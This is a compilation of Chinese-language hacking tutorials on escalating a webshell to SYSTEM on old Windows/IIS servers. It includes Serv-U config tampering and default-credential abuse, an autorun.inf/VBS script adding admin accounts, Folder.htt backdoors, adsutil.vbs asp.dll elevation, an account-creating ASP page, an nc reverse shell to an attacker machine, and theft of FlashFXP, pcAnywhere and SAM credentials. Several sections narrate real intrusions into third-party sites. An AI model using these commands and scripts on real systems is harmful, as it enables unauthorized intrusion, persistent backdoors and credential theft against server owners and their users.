WEBSHELL權限提升技巧

  WEBSHELL權限提升技巧
c: d: e:.....
C:/Documents and Settings/All Users/「開始」菜單/程序/
      看這裏能不能跳轉，我們從這裏可以獲取好多有用的信息比如Serv-U的路徑，
C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/
      看能否跳轉到這個目錄，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywhere密碼，登陸
c:/Program Files/serv-u/
C:/WINNT/system32/config/
      下它的SAM，破解密碼
c:/winnt/system32/inetsrv/data/
      是erveryone 完全控制，很多時候沒作限制，把提升權限的工具上傳上去，然後執行
c:/prel
C:/Program Files/Java Web Start/
c:/Documents and Settings/
C:/Documents and Settings/All Users/
c:/winnt/system32/inetsrv/data/
c:/Program Files/
c:/Program Files/serv-u/
C:/Program Files/Microsoft SQL Server/
c:/Temp/
c:/mysql/(如果服務器支持PHP）
c:/PHP(如果服務器支持PHP）
      運行"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"來提升權限還可以用這段代碼試提升，好象不是很理想的 .
      如果主機設置很變態，可以試下在c:/Documents and Settings/All Users/「開始」菜單/程序/啓動"寫入bat，vbs等木馬。
      根目錄下隱藏autorun.inf
C:/PROGRAM FILES/KV2004/ 綁
D:/PROGRAM FILES/RISING/RAV/
C:/Program Files/Real/RealServer/
rar
Folder.htt與desktop.ini
      將 改寫的Folder.htt與desktop.ini，還有你的木馬或者是VBS或者是什麼，放到對方管理員最可能瀏覽的目錄下replace 替換法 捆綁腳本 編寫一個啓動/關機腳本重起刪SAM :( 錯 CAcls命令FlashFXP文件夾Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak
Ring的權限提升21大法！
      以下全部是本人提權時候的總結 很多方法至今沒有機會試驗也沒有成功，但是我是的確看見別人成功過的。本人不才，除了第一種方法自己研究的，其他的都是別人的經驗總結。希望對朋友有幫助！
1.radmin連接法
      條件是你權限夠大，對方連防火牆也沒有。封裝個radmin上去，運行，開對方端口，然後radmin上去。本人從來米成功過。，端口到是給對方打開了。
2.paanywhere
C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/ 這裏下他的GIF文件，在本地安裝pcanywhere上去
3.SAM破解
C:/WINNT/system32/config/ 下他的SAM 破解之
4.SU密碼奪取
C:/Documents and Settings/All Users/「開始」菜單/程序/
引用：Serv-U，然後本地查看屬性，知道路徑後，看能否跳轉
進去後，如果有權限修改ServUDaemon.ini，加個用戶上去，密碼爲空
[USER=WekweN|1]
Password=
HomeDir=c:/
TimeOut=600
Maintenance=System
Access1=C:/|RWAMELCDP
Access1=d:/|RWAMELCDP
Access1=f:/|RWAMELCDP
SKEYvalues=
這個用戶具有最高權限，然後我們就可以ftp上去 quote site exec xxx 來提升權限
5.c:/winnt/system32/inetsrv/data/
引用：就是這個目錄，同樣是erveryone 完全控制，我們所要做的就是把提升權限的工具上傳上去，
然後執行
6.SU溢出提權
這個網上教程N多 不詳細講解了
7.運行Csript
引用：運行"cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps"來提
升權限
用這個cscript C:/Inetpub/AdminScripts/adsutil.vbs get w3svc/inprocessisapiapps
查看有特權的dll文件：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
再將asp.dll加入特權一族
asp.dll是放在c:/winnt/system32/inetsrv/asp.dll (不同的機子放的位置不一定一樣)
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:/WINNT/system32/idq.dll"
"C:/WINNT/system32/inetsrv/httpext.dll" "C:/WINNT/system32/inetsrv/httpodbc.dll"
"C:/WINNT/system32/inetsrv/ssinc.dll" "C:/WINNT/system32/msw3prt.dll""c:/winnt/system32
/inetsrv/asp.dll"
可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去了 8.腳本提權
c:/Documents and Settings/All Users/「開始」菜單/程序/啓動"寫入bat，vbs
9.VNC
這個是小花的文章 HOHO
默認情況下VNC密碼存放在HKCU/Software/ORL/WinVNC3/Password
我們可以用vncx4
破解它，vncx4使用很簡單，只要在命令行下輸入
c:/>vncx4 -W
然後順序輸入上面的每一個十六進制數據，沒輸完一個回車一次就行了。
10.NC提權
給對方來個NC 但是條件是你要有足夠的運行權限 然後把它反彈到自己的電腦上 HOHO OK了
11.社會工程學之GUEST提權
很簡單 查看他的擁護 一般來說 看到帳戶以後 密碼儘量猜 可能用戶密碼一樣 也可能是他QQ號 郵
箱號 手機號 儘量看看 HOHO
12.IPC空連接
如果對方真比較白癡的話 掃他的IPC 如果運氣好還是弱口令
13.替換服務
這個不用說了吧？個人感覺相當複雜
14.autorun .inf
autorun=xxx.exe 這個=後面自己寫 HOHO 加上只讀、系統、隱藏屬性 傳到哪個盤都可以的 不相信
他不運行
15.desktop.ini與Folder.htt
引用：首先，我們現在本地建立一個文件夾，名字不重要，進入它，在空白處點右鍵，選擇"自定義
文件夾"（xp好像是不行的）一直下點，默認即可。完成後，你就會看到在此目錄下多了兩個名爲Folder
setting的文件架與desktop.ini的文件，（如果你看不到，先取消"隱藏受保護的操作系統文件"）然後
我們在Folder setting目錄下找到Folder.htt文件，記事本打開，在任意地方加入以下代碼：
然後你將你的後門文件放在Folder setting目錄下，把此目錄與desktop.ini一起上傳到對方
任意一個目錄下，就可以了，只要等管理員瀏覽了此目錄，它就執行了我們的後門
16.su覆蓋提權
本地安裝個su，將你自己的ServUDaemon.ini文件用從他那下載下來的ServUDaemon.ini 覆蓋掉，重
起一下Serv-U，於是你上面的所有配置都與他的一模一樣了
17.SU轉發端口
43958這個是 Serv －U 的本地管理端口。FPIPE.exe上傳他，執行命令： Fpipe –v –l 3333 –r
43958 127.0.0.1 意思是將4444端口映射到43958端口上。 然後就可以在本地安裝一個Serv-u，新建一個
服務器，IP填對方IP，帳號爲LocalAdministrator 密碼爲#1@$ak#.1k;0@p 連接上後你就可以管理他的
Serv-u了
18.SQL帳戶密碼泄露
如果對方開了MSSQL服務器，我們就可以通過用SQL連接器加管理員帳號（可以從他的連接數據庫的
ASP文件中看到），因爲MSSQL是默認的SYSTEM權限。
引用：對方沒有刪除xp_cmdshell 方法：使用Sqlexec.exe，在host 一欄中填入對方IP，User與Pass
中填入你所得到的用戶名與密碼。format選擇xp_cmdshell"%s"即可。然後點擊connect，連接上後就可
以在CMD一欄中輸入你想要的CMD命令了
19.asp.dll
引用：因爲asp.dll是放在c:/winnt/system32/inetsrv/asp.dll (不同的機子放的位置不一定相同
)
我們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:/WINNT/system32/idq.dll"
"C:/WINNT/system32/inetsrv/httpext.dll" "C:/WINNT/system32/inetsrv/httpodbc.dll"
"C:/WINNT/system32/inetsrv/ssinc.dll" "C:/WINNT/system32/msw3prt.dll""c:/winnt/system32
/inetsrv/asp.dll"
好了,現在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去
了,注意,用法中的get和set,一個是查看一個是設置.還有就是你運行上面的你要到
C:/Inetpub/AdminScripts>這個目錄下.
那麼如果你是一個管理員,你的機子被人用這招把asp提升爲system權限,那麼,這時,防的方法就是把
asp.dll T出特權一族,也就是用set這個命令,覆蓋掉剛纔的那些東東.
20.Magic Winmail
前提是你要有個webshell 引用：http://www.eviloctal.com/forum/read.phptid=3587這裏去看吧
21.DBO……
其實 提升權限的方式很多的 就看大家怎麼利用了 HOHO 加油吧 將服務器控制到底！
感謝noangel
WEBSHELL權限提升
動網上傳漏洞，相信大家拿下不少肉雞吧，但是都是WEBSHELL，不能拿到系統權限，要如何拿到系統權限呢？這正是我們這次要討論的內容
OK，進入我的WEBSHELL
啊哈，不錯，雙CPU，速度應該跟的上，不拿下你我怎麼甘心啊
輸入密碼，進入到裏面看看，有什麼好東西沒有，翻了下，好像也沒有什麼特別的東西，看看能不能進到其他的盤符，點了下C盤，不錯不錯，可以進去，這樣提升就大有希望了
一 serv－u提升
OK， 看看他的PROGRAME裏面有些什麼程序，哦，有SERV-U，記得有次看到SERV-U有默認的用戶名和密碼，但是監聽的端口是43958，而且是隻 有本地才能訪問的，但是我們有端口轉發工具的啊，不怕。先看看他的SERV-U的版本是多少，telnet XXX.XXX.XXX.XXX 21
顯示竟然是3.0的，唉，不得不說這個管理員真的不稱職。後來完畢後掃描了下，也只有FTP的洞沒有補。既然是這樣，我們就開始我們的提升權限了
上傳FPIPE，端口轉發工具， 圖三
在運行CMD命令裏輸入d://wwwroot//fpipe.exe -v -l 81 -r 43958 127.0.0.1 意思是把本機的43598端口轉發到81端口
然 後打開我們自己機子上的SERV-U，點Serv－U服務器，點菜單欄上的的服務器，點新建服務器，然後輸入IP，輸入端口，記得端口是剛剛我們轉發的 81端口。服務名稱隨便你喜歡，怎麼樣都行。然後是用戶名：LocalAdministrator 密碼：#l@$ak#.lk;0@P (密碼都是字母)
確定，然後點剛剛建的服務器，然後就可以看到已有的用戶，自己新建一個用戶，把所有權限加上。也不鎖定根目錄
接下來就是登陸了，登陸FTP一定要在CMD下登陸，
進入後一般命令和DOS一樣，添加用戶的時候
ftp>quote site exec net.exe user hk pass /add
ftp>quote site exec net.exe localgroup administrators hk/add
如果對方開了3389的話，就不用我教你怎麼做了，沒開的話，新建立IPC連接，在上傳木馬或者是開啓3389的工具
二
auto.ini 加 SHELL.VBS
autorun.inf
[autorun]
open=shell.vbs
shell.vbs
dim wsh
set wsh=createObject("WScript.Shell")
wsh.run "net user guest /active:yes",0
wsh.run "net user guest 520ls",0
wsh.run "net localgroup administrators guest /add",0
wsh.run "net user hkbme 520ls /add",0
wsh.run "net localgroup administrators hkbme /add",0
wsh.run "cmd.exe /c del autorun.inf",0
wsh.run "cmd.exe /c del shell.vbs",0
但是這樣要可以訪問到對方的根目錄。將這兩個文件放到對方硬盤的根目錄下。當然你也可以直接執行木馬程序，還要一個木馬程序，但是語句就和最後兩句一樣，通過CMD執行木馬程序
三
Folder.htt與desktop.ini
將改寫的Folder.htt與desktop.ini，還有你的木馬或者是VBS或者是什麼，放到對方管理員最可能瀏覽的目錄下，覺得一個不夠，可以多放幾個
Folder.htt添加代碼


但是後門和這兩個文件必須要放到一塊，有點問題，可以結合啓動VBS，運行結束後，刪除上傳的後門.就是CODEBASE="shell.vbs".shell寫法如上
四
replace
替換法，可以替換正在執行的文件。用這個幾乎可以馬上得到權限，但是我沒有做過試驗，可以試下，將對方正在執行的文件替換爲和它文件名一樣的，捆綁了木馬的。爲什麼不直接替換木馬呢？如果替換的是關鍵程序，那不是就直接掛了？所以還是捆綁好點
格式
REPLACE [drive1:][path1]filename [drive2:][path2] [/A]
[/R] [/W]
REPLACE [drive1:][path1]filename [drive2:][path2]
[/R] [/S] [/W]
　 [drive1:][path1]filename 指定源文件。
　 [drive2:][path2] 指定要替換文件的
　　　　　　　　　　　　　 目錄。
　 /A 把新文件加入目標目錄。不能和
　　　　　　　　　　　　　 /S 或 /U 命令行開關搭配使用。
　 /P 替換文件或加入源文件之前會先提示您
　　　　　　　　　　　　　 進行確認。
　 /R 替換隻讀文件以及未受保護的
　　　　　　　　　　　　　 文件。
　 /S 替換目標目錄中所有子目錄的文件。
　　　　　　　　　　　　　 不能與 /A 命令選項
　　　　　　　　　　　　　 搭配使用。
　 /W 等您插入磁盤以後再運行。
　 /U 只會替換或更新比源文件日期早的文件。
　　　　　　　　　　　　　 不能與 /A 命令行開關搭配使用
這個命令沒有試驗過，看能不能替換不能訪問的文件夾下的文件，大家可以試驗下
五
腳本
編寫一個啓動/關機腳本配置文件scripts.ini，這個文件名是固定的，不能改變。內容如下：
[Startup]
0CmdLine=a.bat
0Parameters=
將文件scripts.ini保存到"C://winnt//system32//GroupPolicy//Machine//Scripts"
A.BAT的內容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator XXX
這樣可以恢復你想要得任意用戶名的密碼，也可以自己增加新的用戶，但是要依賴重啓，還有就是對SYSTEM32有寫的權限
六
SAM
如果可以訪問對方的SYSTEM32的話，刪除對方的SAM文件，等他重啓以後就是ADMIN用戶密碼爲空
突然又有了想法，可以用REPLACE命令替換的嗎，可以把你的SAM文件提取出來，上傳到他的任意目錄下，然後替換。不過不知道如果對SYSTEM32沒有權限訪問的話，能不能實現替換
--------------------------------------------------------------------------------
--
--
使 用FlashFXP來提升權限 最近各位一定得到不少肉雞吧:)，從前段時間的動網的upfile漏洞， 動力文章系統最新漏洞到first see發現的動網sql版本的一個超級大漏洞。有人一定忙的不易樂乎，大家的方法也不過是使用一下asp腳本的後門罷了。至於提 升權限的問題呵呵，很少有人能作一口氣完成。關鍵還是在提升權限上做個問題上，不少服務器設置的很BT，你的asp木馬可能都用不了，還那裏來的提升啊。 我們得到webshell也就是個低級別的用戶的權限，各種提升權限方法是可謂五花八門啊，如何提升就看你自己的妙 招了。
其一，如果服務器 上有裝了pcanywhere服務端，管理員爲了便於管理也給了我們方便，到系統盤的 Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下載*.cif本地破解就使用pcanywhere連接就ok了。
其二，如果對方有Serv-U大家不要罵我啊，通過修改ServUDaemon.ini和fpipe這軟件提升權限應該是不成問 題吧。
其三，通過替換系統服務來提升。
其四，查找conn和config這類型的文件看能否得到sa或者mysql的相關密碼，可能會有所收穫等等。
本人在一次無聊的入侵過程中發現了這個方法，使用Flashfxp也能提升權限，但是成功率高不高就看你自己的運氣了:)
本人www.xxx.com 通過bbs得到了一個webshell，放了個小馬(現在海陽的名氣太大了偶不敢放)，而且已經將一段代碼插入了N個文件中，夠黑吧。提升權限沒時間做。 在我放假回家後，一看我暈bbs升級到動網sp2了我放的小馬也被K了，人家的BBS是access版本的。鬱悶啊！突然想起我將一個頁面插入了asp的 後門，看看還有沒有希望了。輸www.xxx.com/xx.aspid =1 好傢伙，還在！高興ing
圖1
於是上傳了一個asp的腳本的後門，怎麼提升權限呢
在這個網站的主機上游蕩了N分鐘，在C:// Program Files下發現了FlashFXP文件夾(跟我一樣使用這個軟件自己心裏暗想)圖2，於是就打了了Sites. dat這個文件(編輯)這是什麼東西密碼和用戶名，而且密碼是加了密的。
如果我把這些文件copy回本地也就是我的計算機中，替換我本地的相應文件會怎麼樣呢
於是我就將Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak幾個文件下載到我的計算機中替換了我電腦中flashfxp文件夾的相應文件。打開flashfxp 在站點中打開站點管理器一項。乖 乖發財了
對方管理員通過flashfxp連接的各個站點都在圖3，點擊連接。通過了於是我們又有了一堆肉雞，我們有ftp權限。上傳腳本 木馬~ 呵呵。
說了半天這提升權限的事情一點沒講啊
不要急，大家看看對方管理員的這站點管理器，有用戶名和密碼，密碼是星號的。可惜啊！
又想起了在Sites.dat中也顯示了密碼和用戶名，而且密碼是加密的。
現在的星號密碼會不會也是加了密的看看就行了唄。
怎麼看 菜鳥了吧 手頭有個不錯的查看星號的軟件，就是xp星號密碼查看器，通過查看跟Sites.dat中加密了密碼做比較。看圖4和圖5 的比較 很顯然在站點管理器中查看到的密碼是明文顯示的。發財了吧
下一步就是使用xp星號密碼查看器這個軟件來提取密碼和用戶名。看者這些複雜的密碼，還真有點懷念當年玩sniff的時光。呵呵
密碼爲:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用戶名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密碼和用戶名已經作了必要的修改)
這麼多的信息，按社會工程學的概念來說，沒有管理員的密碼。打死我也不相信。最終我得到了這個網站管理員的密碼從這堆東西中找到 的。
我 想這個問題應該反饋到flashfxp官方，讓他們在下個版本中修正這個漏洞或者說是錯誤。經過後來測試只要把含有密碼和用戶名的Sites.dat文件 替換到本地相應的文件就可以在本地還原對方管理員的各個站點的密碼。希望大家在入侵的時候遇到fla shfxp的時候能想到這個方法，至少也可以得到一堆新的肉雞。不防試試希望能給大家滲透帶來幫助。
--------------------------------------------------------------------------------
--
--
將asp權限提到最高by: cnqing from:http://friend.91eb.com
本來是要寫個提權asp木馬的，可惜時間不是太多功底也不是太深。先把原理方法告訴大家好了。簡單說說，說的太麻煩沒有必要。懂了就行。
原理：
asp文件的教本解釋是由asp.dll運行的。由dllhost.exe啓動的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接啓動。身份是system
方法：
第一步。
得到inprocesslsapiapps內容，用命令"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"。將得到的一組dll複製下來。
第二步
寫 一個bat內容爲"cscript C://Inetpub//AdminScripts// adsutil vbs set w3svc/inprpocessisapiapps "C://Inetpub//AdminScripts//asp.dll" ·····
省略號爲複製下的內容。中間用空格分開不要帶回車符
最後運行這個bat就行了。
例如：
我用"cscript C://Inetpub//AdminScripts//adsutil.vbs get w3svc/inprocessisapiapps"得到
"c://winnt//system32//inetsrv//httpext.dll"
"c://winnt//system32//inetsrv//httpodbc.dll"
"C://WINNT//system32//inetsrv//ssinc.dll"
"C://WINNT//System32//msw3prt.dll"
"C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_aut//author.dll"
"C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_adm//admin.dll"
"C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//shtml.dll"
那麼你的bat就應該是：
cscript C://Inetpub//AdminScripts//adsutil vbs set w3svc/inprpocessisapiapps "C://Inetpub//AdminScripts//asp.dll" "c://winnt//system32//inetsrv//httpext.dll" "c://winnt//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//System32//msw3prt.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_aut//author.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//_vti_adm//admin.dll" "C://Program Files//Common Files//Microsoft Shared//Web Server Extensions//isapi//shtml.dll"
已測試成功！！
--------------------------------------------------------------------------------
--
--
利用%5c繞過驗證
利用%5c繞過驗證
---------------------------------------
lake2（http://mrhupo.126.com）
2004-11-27
---------------------------------------
說到%5c，你是不是想起了當前流行的那個%5c暴庫漏洞，呵呵，本文就是對%5c利用的探索（呵呵，當然有我提出的新東東，或許對你有幫助哦^_^）。
好，我們先追根溯源，找到那個漏洞的老底。看看綠盟2001年的漏洞公告：http://www.nsfocus.net/index.phpac...iew&bug_id=1429
N 年以前利用這個漏洞可以實現目錄遍歷，雖然微軟出了補丁，不過好像補丁是用來限制iis只能訪問虛擬目錄的，所以漏洞還是存在，只不過利用方式變了。對 iis來說，提交一個含有%5c的url能夠找到文件，但是該文件裏以相對路徑引用的其他文件卻找不到了（%5c是//的url編碼，iis跳轉到上一級 目錄去找，當然找不到；頭暈了吧，哈哈，我也頭暈啊）。
後來這個漏洞就被牛人挖掘出來了，也就是傳說中的%5c暴庫：由於連接數據庫的文件引用的相對路徑，提交%5c找不到文件，所以導致出錯，iis就會老老實實的說出數據庫的路徑（不明白？找google）。
一個偶然的機會我發現還可以利用%5c繞過asp的驗證；當我們暴庫失敗的時候不妨試試。
廢話少說，看下面的代碼：

guest_user or readpasswordguest_password then
response.write "請輸入正確地管理員密碼！"
response.end
else
session("admin")=1 /'登陸後寫入seesion中保存
response.write("登陸成功，請返回信息頁")
end if
%>
看到沒有，要想通過驗證必須讓數據庫裏的用戶名密碼與提交的一致；想到什麼？讓我們再看看數據庫連接文件代碼：

啊，有容錯語句不能暴庫！等等，如果提交%5c數據庫找不到，由於容錯，所以程序會繼續執行，那麼說來從數據庫得到的用戶名密碼皆爲空（想想有時暴庫失敗是不是看到空空的框架，因爲數據都是空嘛），哈哈，這樣我們就繞過驗證了！
知道怎麼做了吧，把登陸頁面保存到本地，修改提交的url，把最後一個/改成%5c，用戶名密碼用空格（有的程序會檢查用戶名密碼是否爲空，空格會被程序過濾），提交，就ok了。
誒，各位不要以爲我自己沒事寫段代碼來搗鼓，實際上這個是我們學校一個高手做的留言板程序，就掛在學校的主頁，呵呵。
既然弄懂了原理，當然要找實際漏洞啦，自然是拿大名鼎鼎的"洞"網論壇開刀。不過失敗了，因爲它的數據庫連接文件裏有這麼一段：
If Err Then
err.Clear
Set Conn = Nothing
Response.Write "數據庫連接出錯，請檢查連接字串。"
Response.End
End If
數據庫找不到程序就結束了，呵呵，空歡喜一場。
接着又去down了bbsxp論壇，打開數據庫連接文件，暈，根本沒有容錯語句；呵呵，不過可以暴庫哦。
我又不是BT，所以不去找事了，寫篇文章，算是給各位高手提供資料吧。
總結一下這個攻擊方法成功的條件：1、數據庫連接用的相對路徑且僅有簡單的容錯語句；2、服務器iis版本爲4或5；3、程序裏不檢查空字符或者檢查時不過濾空格而比較時過濾空格；4、程序不能在一級目錄
至於防範，呵呵，既然攻擊條件知道了，防範措施自然也出來了^_^
--------------------------------------------------------------------------------
--
--
添加超級用戶的.asp代碼[藍屏的原創,凱文改進,Ms未公佈的漏洞]
作者：藍屏,凱文 文章來源：冰點極限
其實上個禮拜我和凱文就在我的肉雞上測試了,還有河馬史詩.結果是在user權限下成功添加Administrators組的用戶了(雖然我不敢相信我的眼睛).
上次凱文不發話,我不敢發佈啊....現在在他的blog 上看到他發佈了,就轉來了咯(比我上次測試時還改進了一點,加了個表單).這下大家有福咯```
反正代碼是對的，但是很少能成功，具體的看運氣了。。呵呵，下一步我想把他整合到海洋裏面去。嘿嘿。
.network對象腳本權限提升漏洞利用工具

用戶:

密碼:



"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~今天你還是別買6+1了……省下2元錢買瓶可樂也好……"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登錄")>0 then
response.write "雖然沒有錯誤,但是好象也沒建立成功.你一定很鬱悶吧"
else
Response.write "OMG!"&username&"帳號居然成了!這可是未知漏洞啊.5,000,000RMB是你的了"
end if
end if
else
response.write "請輸入輸入用戶名"
end if
end if
%>
如何繞過防火牆提升權限
本文講的重點是webshell權限的提升和繞過防火牆，高手勿笑。
廢話少說，咱們進入正題。
首先確定一下目標：http://www.sun***.com ，常見的虛擬主機。利用Upfile的漏洞相信大家獲得webshell不難。我們這次獲得這個webshell，不是DVBBS，而是自由動力3.6的軟件上傳過濾不嚴。網站http://www.sun***.com/lemon/Index.asp 是自由動力3.6文章系統。Xr運用 WinHex.exe和WSockExpert.exe上傳一個網頁木馬newmm.asp，用過動鯊的 door.exe的人都知道，這個是上傳asp木馬內容的。於是，上傳海洋2005a，成功獲得webshell。
測 試一下權限，在cmd裏運行set，獲得主機一些信息，系統盤是D盤，也說明了我們的webshell有運行權限的。那我們看看C盤有什麼呢？難道是雙系 統？瀏覽後發現沒有什麼系統文件，只有一些垃圾文件，暈死。沒關係，再來檢查一下，虛擬主機都有serv-u的，這臺也不例外，是5.0.0.8的。呵 呵，是有本地溢出的呀，挖哈哈。
思路：上傳serv-u本地溢出文件srv.exe和nc.exe利用nc來反連接獲得系統shell。大家 是不是發現海洋2005a那個上傳的組件不好用（反正我總遇到這個問題），沒關係，用rain改的一個無組件上傳，一共有3個文件，up.htm, upload.asp和 uploadclass.asp。upload.asp和uploadclass.asp上傳到同一個文件夾，up.htm是本地用的，修改up.htm 裏的鏈接地址爲：http://www.sun***.com/lemon/upload.asp就可以上傳了。
傳 上了srv.exe和nc.exe在H://long//sun***//lemon（網站目錄）後，發現沒有運行權限。沒關係，根據經驗，一般系統下 D: //Documents and Settings//All Users//是應該有運行權限的。於是想把文件copy過去，但是發現我們的 webshell沒有對D盤寫的權限，暈死。
可以瀏覽D://program files//serv-u//ServUDaemon.ini,不能改，難道要破解serv-u的密碼，暈，不想。
不 可以這麼就泄氣了，我突然想到爲什麼系統不放在C盤了，難道C盤是FAT32分區的？（後來證明了我們的想法。這裏說一下，如果主機有win98的系統 盤，那裏99%是FAT32分區的。我們還遇到過裝有Ghost的主機，爲了方便在DOS下備份，它的備份盤一般都是FAT分區的。）如果系統盤是 FAT32分區，則網站就沒有什麼安全性可言了。雖然C盤不是系統盤，但是我們有執行權限。呵呵，copy srv.exe和nc.exe到c://，運行 srv.exe "nc.exe –e cmd.exe 202.*.*.* 888",這裏的202.*.*.*是我們的肉雞，在這之前我們已經在肉雞上運行了nc –l –p 888。我們在學校內網裏，沒有公網ip，不爽-ing。
我們成功獲得一個系統shell連上肉雞。（看起來簡單，其實這裏我們也遇到過挫 折，我們發現有些版本的nc居然沒有-e這個參數，還以爲全世界nc功能都一樣。後來又發現不同版本的nc互連不成功，會出現亂碼，沒辦法用。爲此，上傳 n次，錯誤n次，傻了n次，後來終於成功了。做黑客還真得有耐心和恆心。）
高興之餘，我們仍不滿足，因爲這個shell實在是太慢了。於是， 想用我們最常用的Radmin，其實管理員一按Alt+Ctrl+Del，看進程就能發現 r_server了，但是還是喜歡用它，是因爲不會被查殺。好了，上傳admdll.dll，raddrv.dll，r_server.exe到H:// long//sun***//lemon，再用剛纔nc得到的 shell把它們copy到d://winnt//system32//下，分別運行： r_server /install , net start r_server , r_server /pass:rain /save 。
一 陣漫長的等待，終於顯示成功了。興沖沖用radmin連上去，發現連接失敗。暈死，忘了有防火牆了。上傳pslist和pskill上去，發現有 backice，木馬克星等。Kill掉他們雖然可以登陸，但服務器重啓後還是不行，終不是長久之計呀。防火牆是不防21，80等端口的，於是，我們的思 路又回到了serv-u上了。把他的 ServUDaemon.ini下載下來，覆蓋本機的ServUDaemon.ini，在本機的serv-u上添加一個用戶名爲xr，密碼爲rain的系 統帳號，加上所有權限。再用老辦法，上傳，用shell寫入D://program files//serv-u/ /裏，覆蓋掉原來的ServUDaemon.ini。雖然又等了n長時間，但是成功了，於是用flashfxp連上，發生 530錯誤。鬱悶，怎麼又失敗了。（根據經驗這樣應該就可以了，但爲什麼不行沒有想通，請高手指點。）
不管了，我們重啓serv-u就ok 了，怎麼重啓呢，開始想用 shutdown重啓系統，但那樣我們就失去了nc這個shell，還可能被發現。後來，眼睛一亮，我們不是有pskill嗎？剛纔用pslist發現有 這個進程：ServUDaemon 。把它kill了。然後再運行D://program files//serv-u// ServUAdmin.exe ，這裏要注意不是ServUDaemon.exe 。
好了，到這裏，我們直接ftp上去吧，ls一下，哈哈，系統盤在我的掌握下。我們能不能運行系統命令呢？是可以的，這樣就可以：
ftp>quote site exec net user xr rain /add
在webshell上運行net user，就可以看見添加成功了。
整個入侵滲透到這就結束了，在一陣後清理打掃後。我們就開始討論了。其實，突破防火牆有很多好的rootkit可以做到的，但是我們覺得系統自帶的服務纔是最安全的後門。
--------------------------------------------------------------------------------
--
--
asp.dll解析成system提升權限
網絡上傳統的提升asp權限爲系統的有兩種:
1.圖形化下的,把默認站點---->主目錄--->應用程序保護設置爲低,這樣就可以把asp權限設置爲system.
但這種提升方法很容易被發現,所以網絡有另一種一般是用adsutil.vbs來提升權限.而這個也是今天
我要談的關於adsutil.vbs提升權限.
2.用adsutil.vbs搞定.
在網絡上我看到了很多的教你用這種方法的動畫,文章,但我至今沒有看到一篇介紹原理的,下面我談談我個人的看法:
先舉個例子:
有一羣狗,這羣狗裏有幾個長老級狗物,它們擁有着至高無上的權限,而其它的狗,他們的權限則少得可憐.
轉到計算機上:
在IIS中,有幾個Dll文件是擁有特權限的,我們可以理解爲系統權限,就像長老級的狗.而解析asp的asp.dll則就像一隻
普通的狗,他的權限少得可憐.
那麼,如果asp.dll也成了長老級的狗的話,那麼asp不也就有了系統權限了嗎,這是可以成立的.所以我們的思路也就是
把asp.dll加入特權的dll一族之中.提升步驟爲:
先查看有特權一話有哪些.
加asp.dll加入特權一族
好了,下面我們就來實踐這個過程.
1)查看有特權的dll文件:
命令爲:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
得到顯示爲:
C://Inetpub//AdminScripts>cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
Microsoft (R) Windows 腳本宿主版本 5.1 for Windows
版權所有(C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C://WINNT//system32//idq.dll"
"C://WINNT//system32//inetsrv//httpext.dll"
"C://WINNT//system32//inetsrv//httpodbc.dll"
"C://WINNT//system32//inetsrv//ssinc.dll"
"C://WINNT//system32//msw3prt.dll"
看到沒有,他說明的是有特權限一族爲:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
這幾個文件,不同的機子,可能會不同.
2)把asp.dll加入特權一族:
因爲asp.dll是放在c://winnt//system32//inetsrv//asp.dll (不同的機子放的位置不一定相同)
我 們現在加進去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C://WINNT// system32//idq.dll" "C://WINNT//system32//inetsrv//httpext.dll" "C://WINNT//system32//inetsrv//httpodbc.dll" "C://WINNT//system32//inetsrv//ssinc.dll" "C://WINNT//system32//msw3prt.dll""c://winnt//system32//inetsrv//asp.dll"
好了,現在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 來查看是不是加進去
了,注意,用法中的get和set,一個是查看一個是設置.還有就是你運行上面的你要到C://Inetpub//AdminScripts>這個目錄下.
那麼如果你是一個管理員,你的機子被人用這招把asp提升爲system權限,那麼,這時,防的方法就是把asp.dll T出特權一族,也就是用set這個命令,覆蓋掉剛纔的那些東東.
